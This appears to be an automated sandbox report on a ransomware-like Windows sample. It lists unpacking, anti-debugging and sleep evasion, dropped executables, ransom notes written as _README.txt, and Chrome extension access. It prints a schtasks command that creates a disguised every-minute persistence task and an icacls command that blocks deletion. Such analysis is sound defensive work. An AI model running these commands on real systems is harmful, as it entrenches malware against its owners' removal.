Source:	Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

2_2_00412220

PE file contains sections with non-standard names

Source: build3[1].exe.7.dr	Static PE information: section name: .kic
Source: sqln[1].dll.11.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.16.dr	Static PE information: section name: .kic

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_00406805 push ecx; ret	0_2_00406818
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_0449B0AF push ecx; retf	0_2_0449B0B2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EC8F05 push ecx; ret	0_2_05EC8F18
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00428565 push ecx; ret	2_2_00428578
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_044590AF push ecx; retf	5_2_044590B2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DD8F05 push ecx; ret	5_2_05DD8F18
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_0457B0AF push ecx; retf	6_2_0457B0B2
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EE8F05 push ecx; ret	6_2_05EE8F18

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\R5391762lf.exe

System file written: C:\Users\user\AppData\Local\Temp\chrome.exe

Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\R5391762lf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_00405653 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00405653

Uses cacls to modify the permissions of files

Source: C:\Users\user\Desktop\R5391762lf.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\R5391762lf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0449971C rdtsc

0_2_0449971C

Contains functionality to query network adapater information

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

2_2_0040E670

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\R5391762lf.exe

Thread delayed: delay time: 700000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 2142
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 7857

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\R5391762lf.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\R5391762lf.exe TID: 7700	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep count: 2142 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep time: -481950s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep count: 7857 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep time: -1767825s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040FB98

Source: C:\Users\user\Desktop\R5391762lf.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'H
Source: R5391762lf.exe, 00000002.00000002.1397540119.000000000067A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\R5391762lf.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\R5391762lf.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0449971C rdtsc

0_2_0449971C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0040A3A4 IsDebuggerPresent,

0_2_0040A3A4

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

2_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_044980A3 push dword ptr fs:[00000030h]	0_2_044980A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA0042 push dword ptr fs:[00000030h]	0_2_05EA0042
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_044560A3 push dword ptr fs:[00000030h]	5_2_044560A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB0042 push dword ptr fs:[00000030h]	5_2_05DB0042
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_045780A3 push dword ptr fs:[00000030h]	6_2_045780A3
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC0042 push dword ptr fs:[00000030h]	6_2_05EC0042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_00405A52 GetProcessHeap,

0_2_00405A52

